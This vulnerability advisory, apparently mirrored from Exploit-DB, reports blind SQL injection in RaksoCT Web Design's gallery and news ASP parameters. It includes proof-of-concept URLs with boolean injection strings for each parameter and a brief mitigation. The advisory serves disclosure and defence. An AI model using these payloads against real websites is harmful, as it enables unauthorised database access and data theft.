RaksoCT Web Design Vulnerable to Multiples SQL Injection

vendor:

Web Design

by:

p0pc0rn

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Web Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

RaksoCT Web Design Vulnerable to Multiples SQL Injection

RaksoCT Web Design is vulnerable to multiple SQL Injection attacks. The vulnerable parameters are 'gallery_details.asp?a_id', 'news.asp?intSeq' and 'news.asp?id'. Blind SQL injection can be performed by appending ' and '1'='1' for true and ' and '0'='1' for false to the vulnerable parameters.

Mitigation:

Input validation and sanitization should be performed on user input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

Title        : RaksoCT Web Design Vulnerable to Multiples SQL Injection
Web        : http://raksoct.com/
Found By : p0pc0rn 25/02/2011

Blind SQL
----------
1 - Parameter gallery_details.asp?a_id=[Blind SQL]

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE

2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE

3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE